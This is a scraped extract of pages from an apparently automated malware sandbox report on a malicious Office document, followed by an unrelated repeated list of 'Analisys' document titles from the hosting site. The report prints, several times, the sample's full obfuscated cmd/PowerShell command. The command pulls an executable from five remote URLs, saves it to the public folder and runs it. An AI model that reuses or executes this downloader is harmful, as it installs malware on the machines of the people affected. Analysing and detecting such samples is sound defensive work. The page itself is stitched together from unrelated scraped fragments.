- command: "C:\Windows\system32\cmd.exe" /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2%/v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " - command: C:\Windows\sysnative\cmd.exe /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2% /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " - command: C:\Windows\system32\cmd.exe CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloa

Page 23 Date: 2020-05-24 16:33:21

Page 24: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

dFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD "

SetUnhandledExceptionFilter detected (possible anti-debug)

Page 24 Date: 2020-05-24 16:33:21


Root causes analisys

Root causes analisys

Measurement Systems Analisys

Measurement Systems Analisys

Grasshopper Escapement Analisys

Grasshopper Escapement Analisys

Principal Component Analisys

Principal Component Analisys

analisys: Systematics checks

analisys: Systematics checks

Analisys Transient Tekananan

Analisys Transient Tekananan

Acrylamide analisys

Acrylamide analisys

Analisys Diversity

Analisys Diversity

Defination Derivative Analisys

Defination Derivative Analisys

Signal System Analisys

Signal System Analisys

Thermal Analisys Pharmaceuticals

Thermal Analisys Pharmaceuticals

Wulian analisys

Wulian analisys

Analisys Services 2005

Analisys Services 2005

Discourse Analisys Photocopies

Discourse Analisys Photocopies

Rudin - Analisys

Rudin - Analisys

Ratio Analisys

Ratio Analisys

Incremental dynamic analisys-performace based analisys

Incremental dynamic analisys-performace based analisys

Analisys of the_questionary_results_on_recycling2012

Analisys of the_questionary_results_on_recycling2012

ESTRUCTURAL ANALISYS I

ESTRUCTURAL ANALISYS I

Rapid Oil Analisys

Rapid Oil Analisys